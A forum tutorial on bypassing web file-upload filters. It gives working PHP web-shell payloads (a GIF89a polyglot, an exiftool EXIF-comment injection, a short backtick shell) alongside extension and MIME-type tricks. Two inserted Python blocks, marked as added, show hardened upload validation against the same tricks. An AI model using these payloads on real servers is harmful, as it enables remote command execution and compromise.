Bypass File Upload Restrictions on Web Apps to Pop a Shell
by x32x01

Some dynamic websites allow their users to upload files, images, songs, movies, or other specific content; Facebook and LinkedIn, for example, let their users upload profile pictures and résumés. File uploading is crucial for many web applications, and at the same time it is a big risk if proper security controls are not implemented on file uploads.

There are various techniques attackers use to bypass and beat file upload restrictions and pop a shell.

Introduction
Today, we'll discuss how a hacker can make use of an unrestricted file upload vulnerability to compromise websites and servers.

Before getting started, it is important to know the basics about web shells and file upload vulnerabilities. Attackers use web shells for various operations such as executing shell commands, deleting files, creating files, downloading files, etc.

Often it is possible simply to upload a reverse shell without bypassing any filters or restrictions.

Bypassing Blacklists
In blacklisting, certain types of extensions are explicitly prohibited from being uploaded to the server. This might seem like an optimal solution to protect your server from getting infected, but it is possible to bypass it under certain conditions.

File Extensions
Developers may blacklist certain file extensions and prevent users from uploading files that are considered dangerous for the server. But this can be bypassed by changing some strings in the extension to upload and execute a payload or web shell.

Type         Extensions
PHP          .pht, .phtml, .php, .php3, .php4, .php5, .php6, .inc
JSP          .jsp, .jspx, .jsw, .jsv, .jspf
Perl         .pl, .pm, .cgi, .lib
ASP          .asp, .aspx
ColdFusion   .cfm, .cfml, .cfc, .dbm

In some cases changing the extension might not do the trick; instead you have to vary the case, like:
Code:
.pHp, .Php, .phP

Bypassing Whitelists
In whitelisting, the server only accepts specific extensions. For example, a website where you have to upload a profile picture might accept only JPG, JPEG, or PNG files.

Apache allows files to be uploaded with double extensions. That means we can trick the server into accepting a shell that also has a PNG extension at the end.
Code:
shell.php.png
shell.php%00.png
shell.php\x00.jpg
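To show the defender's side of the blacklist and whitelist bypasses above (case variants such as .pHp, double extensions such as shell.php.png, and NUL-byte truncation), here is an added Python example that is not from the original post: the weak blacklist check the post defeats, next to a hardened allow-list check that survives each trick. The extension set is built from the post's own table, the allowed set is a constructed example for a profile-picture endpoint, and the names blacklist_check, safe_filename and is_accepted are chosen here.

```python
import os
import secrets
from typing import Optional

# Extensions the web server would hand to an interpreter if the file landed
# under the web root. Constructed here from the post's own table.
EXECUTABLE_EXTENSIONS = {
    "php", "php3", "php4", "php5", "php6", "pht", "phtml", "inc",
    "jsp", "jspx", "jsw", "jsv", "jspf",
    "pl", "pm", "cgi", "lib",
    "asp", "aspx",
    "cfm", "cfml", "cfc", "dbm",
}

# What a profile-picture endpoint actually needs (constructed allow-list).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


class UploadRejected(ValueError):
    """Raised when a filename fails the hardened check."""


def blacklist_check(filename: str) -> bool:
    """The weak check the post bypasses: case-sensitive, last extension only.

    Returns True when the name would be accepted. shell.pHp and shell.php.png
    both slip through.
    """
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    return ext not in EXECUTABLE_EXTENSIONS


def safe_filename(user_filename: str, token: Optional[str] = None) -> str:
    """Hardened check: returns a server-generated storage name or raises.

    token is an optional fixed name stem (handy in tests); by default a random
    one is generated so the uploader's base name is never reused on disk.
    """
    # 1. Drop any directory part smuggled into the name.
    name = os.path.basename(user_filename.replace("\\", "/"))
    # 2. A NUL byte, raw or percent-encoded, truncates the name in some
    #    C-based stacks (shell.php%00.png); treat it as an attack, not as data.
    if "\x00" in name or "%00" in name.lower():
        raise UploadRejected("NUL byte in filename")
    # 3. Split the whole extension chain and compare case-insensitively, so
    #    .pHp and .Php are the same as .php.
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise UploadRejected("missing extension")
    chain = parts[1:]
    # 4. Reject an executable extension anywhere in the chain (shell.php.png),
    #    not just in the last position.
    if any(ext in EXECUTABLE_EXTENSIONS for ext in chain):
        raise UploadRejected("executable extension in chain")
    # 5. Exactly one extension, and it must be on the allow-list.
    if len(chain) != 1 or chain[0] not in ALLOWED_EXTENSIONS:
        raise UploadRejected("extension not allowed")
    return f"{token or secrets.token_hex(16)}.{chain[0]}"


def is_accepted(user_filename: str) -> bool:
    """Convenience wrapper: True if safe_filename would accept the name."""
    try:
        safe_filename(user_filename)
    except UploadRejected:
        return False
    return True


if __name__ == "__main__":
    for candidate in ["avatar.PNG", "shell.pHp", "shell.php.png", "shell.php%00.png"]:
        print(f"{candidate!r}: blacklist={blacklist_check(candidate)} hardened={is_accepted(candidate)}")
```

The hardened check still only judges the name. What makes the extension irrelevant in practice is storing uploads outside the web root under the generated name and serving them through a handler that never executes anything, so a file that somehow ends in .php is still just bytes.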

Another way to bypass whitelisting is to manipulate file type headers.

If a website accepts images, it will likely also accept GIF images. We can add the GIF89a header to trick the server into accepting the shell as an image.
Code:
GIF89a; <?php system($_GET['cmd']); ?>

Code:
GIF89a;
<?
system($_GET['cmd']); # shellcode goes here
?>

EXIF Data
This method bypasses file upload restrictions by utilizing EXIF data in an image. A comment that contains PHP code will be executed by the server when it processes the image as PHP.

You can do this with GIMP or ExifTool:
Code:
exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' image.png
mv image.png image.php.png

MIME-type
Blacklisting MIME types is also a method of file upload validation. It may be bypassed by intercepting the POST request on the way to the server and modifying the MIME type.

Normal PHP MIME type:
Code:
Content-type: application/x-php
Replace with:
Code:
Content-type: image/jpeg

Other Bypassing Methods
In some situations, the length of the content can also cause trouble when validating uploaded files. For that, the PHP shell command can be shortened like this:
Code:
<?=`$_GET[x]`?>
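The GIF89a polyglot, the EXIF comment, the rewritten Content-Type and the shortened <?= tag all share one weakness from the defender's side: the PHP open tag is literally present in the uploaded bytes, and the client-supplied MIME type proves nothing. Here is an added Python example, not from the original post, of a content check that decides from the bytes alone: it sniffs the real format from magic bytes, requires the extension to match, scans the whole file (header, metadata and EXIF included) for any PHP open tag, and only logs a Content-Type mismatch instead of trusting it. The signature table, the sample inputs and the names sniff_type, contains_server_code and validate_image are constructed for this example.

```python
import re
from typing import Optional, Tuple

# Leading bytes of the image formats the endpoint accepts. The signatures are
# the real PNG/JPEG/GIF headers; the table itself is constructed for this example.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
EXPECTED_CONTENT_TYPE = {"png": "image/png", "jpg": "image/jpeg", "gif": "image/gif"}

# Any PHP open tag in the raw bytes: the full <?php tag, the short tag (<?
# followed by whitespace) and the <?= echo tag the post shortens the shell to.
# It fires on the GIF89a polyglot and on an EXIF Comment alike, because in both
# cases the tag is literally present in the file.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=|\s)", re.IGNORECASE)


def sniff_type(data: bytes) -> Optional[str]:
    """Identify the image format from its leading bytes, ignoring the filename."""
    for kind, signatures in MAGIC.items():
        if any(data.startswith(sig) for sig in signatures):
            return kind
    return None


def contains_server_code(data: bytes) -> bool:
    """True if a PHP open tag appears anywhere in the bytes (header or metadata)."""
    return PHP_OPEN_TAG.search(data) is not None


def validate_image(data: bytes, claimed_ext: str, client_content_type: str) -> Tuple[bool, str]:
    """Accept or reject an upload based on its bytes.

    Returns (accepted, reason). The client's Content-Type header is never a
    trust input: the post shows it being rewritten in the intercepted POST, so
    a mismatch is only recorded for logging.
    """
    kind = sniff_type(data)
    if kind is None:
        return False, "no known image signature"
    ext = claimed_ext.lower().lstrip(".")
    if ext == "jpeg":
        ext = "jpg"
    if ext != kind:
        return False, f"extension .{ext} does not match {kind} content"
    if contains_server_code(data):
        return False, "PHP open tag embedded in image bytes"
    if client_content_type.lower() != EXPECTED_CONTENT_TYPE[kind]:
        return True, "ok (client Content-Type mismatch logged)"
    return True, "ok"


# Constructed test inputs: a bare PNG header, the GIF89a polyglot shape from the
# post with a harmless PHP body, and a JPEG whose EXIF segment holds a short tag.
CLEAN_PNG = MAGIC["png"][0] + b"\x00" * 16
GIF_POLYGLOT = b"GIF89a; <?php echo 'x'; ?>"
EXIF_COMMENT_JPG = b"\xff\xd8\xff\xe1\x00\x20Exif\x00\x00<?= 1 ?>"

if __name__ == "__main__":
    for label, blob, ext, ctype in [
        ("clean png", CLEAN_PNG, "png", "image/png"),
        ("gif polyglot", GIF_POLYGLOT, "gif", "image/gif"),
        ("exif comment", EXIF_COMMENT_JPG, "jpg", "image/jpeg"),
        ("renamed php", b"<?php echo 1; ?>", "png", "image/jpeg"),
    ]:
        print(label, validate_image(blob, ext, ctype))
```

The tag scan is defense in depth, not the primary control. The stronger fix is to decode the upload with an image library and re-encode it to a fresh file, which discards EXIF comments and any trailing bytes, and then to store the result outside the web root where no interpreter is mapped to it.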
 
